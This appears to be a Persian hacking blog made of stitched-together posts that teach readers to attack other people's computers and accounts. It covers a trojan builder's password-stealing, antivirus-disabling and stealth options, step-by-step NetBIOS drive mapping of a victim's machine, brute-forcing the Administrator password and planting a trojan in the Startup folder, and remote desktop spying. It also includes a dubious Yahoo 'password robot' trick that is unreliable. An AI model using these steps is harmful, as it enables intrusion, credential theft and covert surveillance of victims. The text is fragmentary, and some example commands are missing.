4-دارای حجم فایل کمتری نیز میباشد
5-یک قابلیت بی نظیر دیگر آن امکان داونلود و نصب یک فایل از اینترنت میباشد که میتوان از آن برای نصب Trojan یا آپدیت سروری که نصب کرده اید استفاده نمود ( برای استفاده از این سیستم با من تماس بگیرید
بعد از ایجاد فایل فقط کافی اونو به طرف Send کنید تا وقتی طرف فایل رو باز کرد اطلاعات برای شما فرستاده شود.
قسمت Option : Send Wxp DialUp Accounts! : ارسال Dialup Account ویندوز Disable AntiVirus&Firewalls : غیر فعال کردن Anti Virus و Fire wall Disable Msconfig : غیر فعال کردن ( بستن ) Msconfig Send WinUsr : ارسال User Name ویندوز Send Password Ontime : ارسال پسورد یاهو بلافاصله بعد از اجرای سرور ... Load on StartUp : لود شدن سرور بعد از بالا آمدن سیستم عامل ... Auto Startup Hide in TaskMgr : مخفی ماندن در Task Manager Disable Regedit : غیر فعال کردن ( بستن ) Regedit Disable Y! Save Password : غیر فعال کردن Save Pass در مسنجر یاهو Exe name after install : تعیین نام فایل بعد از اجرا
Fake Message : طراحی یک Error Message الکی ...
قسمت Notification :
در قسمت Your Email باید ایمیل خود را وارد کنید که پسورد ها برای آن ایمیل ارسال خواهد شد . گزینه Send Password through a link به این معنی است که پسورد رو به یک صفحه که میتونه به زبان PHP هم باشه بفرسته ... ( اگر در این مورد اطلاعاتی ندارید از این گزینه استفاده نکنید . چون به هر حال پسورد برای ایمیل شما خواهد آمد و نیازی به این گزینه ندارید – البته این گزینه فواید جالبی هم داره ... )
قسمت Floppy Worm Virus : توسط این گزینه شما می توانید سرور تروجان خودتون رو همانند یک Worm کنید تا خودش رو از طریق Floppy تکثیر کنه .
قسمت Exe name & icon برای انتخاب نام فایل و icon آن می باشد .
در انتها از گزینه Make Sender برای تولید فایل سرور با مشخصات مورد نظر خودتون می تونید استفاده کنید .
یك درايو از سيستم قرباني را بوسيله نت بايوس share كنيد.
شما به وسيله اين برنامه مي توانيد يك دايو از سيستم قرباني را بوسيله نت بايوس share كنيد. share به معني قيچي كردن و بخش كردن است. هر كاري كه خواستيد توي اون درايو انجام بديد(فايل بزاريد. برداريدو پاك كنيد و...) در كل بگويم راحت ترين راه هك كردن كامپيوتر. بوسيله اين كار مي توانيد به راحتي يك فايل server يا هر فايل ديگري را به كامپيوتر قرباني وارد كنيد و به راحتي او را هك كنيد.
روش كار:
اول بايد IP سيستم مورد نظر رو پيدا كنيد( با عمل netstat -n كه در جلسه هاي قبل توضيح دادم فقط لازم است در جعبه سياه جادويي يك IP را به دلخواه انتخاب كنيد و لازم به كارهايي چون چت با صدا نمي باشد يا هر گونه خودتان مي خواهيد) بعد از گزينه Start در Run اين جمله يعني cmd را تايپ كنيد كه همان جعبه سياه جادويي باز خواهد شد و اين دستور را در اين جعبه تايپ كنيد:
توجه داشته باشيد كه بين$Net و use وx: و \\ip\DriveName فاصله هست كه رعايت آن ضروري مي باشد.
به جاي x مي توانيد هر حرفي را بنويسيد به غير از حروفي كه اسم درايوهاي خودتون هست. مثلا اگر درايو G داشته باشيد از حرف G نمي توانيد استفاده كنيد. به جاي IP هم آي پي فرد مورد نظر رو كه مي خواهيد بهش نفوذ كنيد رو بنويسيد. به جاي DriveName هم اسم درايو رو بنويسيد مثلا اگه مي خواهيد درايو c رو Share كنيد حرفc رو بنويسيد. يك نمونه از دستور رو ببينيد :
اگه كمي شانس داشته باشيد بدون درخواست User Name و Password درايو share ميشه و اين پيغام رو مي نويسه: The command completed successfully . اما اگر از شما در خواست يوزر نيم و پسورد كرد به جاي يوزر نيم كلمه Administrator رو وارد كنيد كه براي ويندوز xp و 2000 تعريف شده است(معمولا تو يه خط يوزرنيم رو ميده). پسورد هم مي تونيد با يه برنامه مثل بروتوس( Brutus) پيدا كنيد.
اگه شما درايوي رو Share كرده باشيد كه ويندوز قرباني هم توهمون درايو نصب شده باشه مي تونيد سرور يك تروجان رو تو پوشه Startup تو قسمت Start Menu كپي كنيد و منتظر باشيد قرباني ريستارت كنه تا فايل سرور اجرا بشه و شما به راحتي با تروجان به سيستم وارد شويد .(يادتون باشه كه سرور رو فقط كپي كنيد چون اگه اجرا كنيد در واقع توسيستم خودتون اجرا كرديد.)
برای هک کردن ایمیل یاهو باید آدرس ایمیل طرف را داشته باشیم
شما با فرستادن این ایمیل به سرور یا همون ربات سرور حمله می کنید... که این کار روبات سرور رو از کار میندازه و هنگ میکنه و بعدش هر چیزی که بخواینن بهتون میده که خیلی عالی میشه
آ هر گونه مسئولیتی در قبال بدست آوردن پسوورد دیگران به عهده خود شخص است.
به یاهو میل برید و در قسمت اول این آدرس رو بنویسید To:
بعد از فرستادن این ایمیل روبات پسوورد یاب یاهو هم یه ایمیل به شما میده که شما با وارد کردن ایمیل قربانی در مکانی که خود یاهو مشخص میکند پسوورد را خواهید دید
شاید بعضی هاتون دیده باشید که بعضی از کسانی که تو یاهو مسنجر بهتون پی ام میدن ٬ تو آیدی هاشون نقطه و یا @ وجود داره. حتما میگید چطوری میشه چنین آیدی هایی رو ساخت. چون یاهو اجازه ساخت چنین آیدی هایی رو نمیده. این چند روزه چند نمونه از این آیدی ها خیلی شیوع پیدا کرد که بیشترینش از آیدی های از نوع my256. بود. امروز هم یه آیدی دیگه که بدین شکل ها هست اضافه شد که تا جایی پر نشده گفتم براتون آموزششو بذارم تا حالشو ببرید. این آیدی ها توش از sogua. استفاده شده.روش عضوت توشو بطور کامل تو عکس ها گفتم. کافیه فرم ها رو پر کنید و اینتر کنید. همه چیز تمومه و شما دارای یه آیدی که توش از sogua. استفاده شده میشید.
یکی از دوستان گفته بود که آموزش DOS بزارم وفرمانهای اون.
واقا من شر مندم چون وقت نمیکنم نمیتونم بزارم ولی چند تا دستور میگم که انجام بدین.
اول وارد ران میشید بعد تایپ کنین cmd
NETSTAT -R
NETSTAT -S
NETSTAT -A
NETSTAT -E
NET
NETSH HELP
TREE
خب بعضی از دوستان به من گفتند چطور می شه دسکتاپ یک نفر رو زیر نظر گرفت
خب برای این کار اول در قسمت run کامپیوتر mstsc را تایپ کنید بعد در قسمتی که میبینید
باید ip طرف رو بهش بدی و بعد connect رو می زنی همین ــــ نظر یادت نره ــــ
انتی ویروس
سلام دوستان این هم یه برنامه ی توپ برای کامپیترتون: اگر کسی از دست تروجان ها خسته شده این انتی ویروس را که اسمش bitdefender 9 pprofessional است برای راحت شدن از دست تروجان ها downlod کنه یا روی کامپیوترش نصب کند که در انتی ویروس های جهان اول شده است
به زودی با کلی برنامه وبلاگ آپ میشه
دانلود
سلام بچه ها ......
اینم یه برنامه که کار خودمه ......
.JPG)
.JPG)
.JPG)
.JPG)
.JPG)
.JPG)
.JPG)
.JPG)
.JPG)
By: page 
این بوتر با بی نهایت ای دی میتونه لوگین شه
که اموزش هم توشه
وبلاگ معروف یاهو ۱۱۰
توجه
.
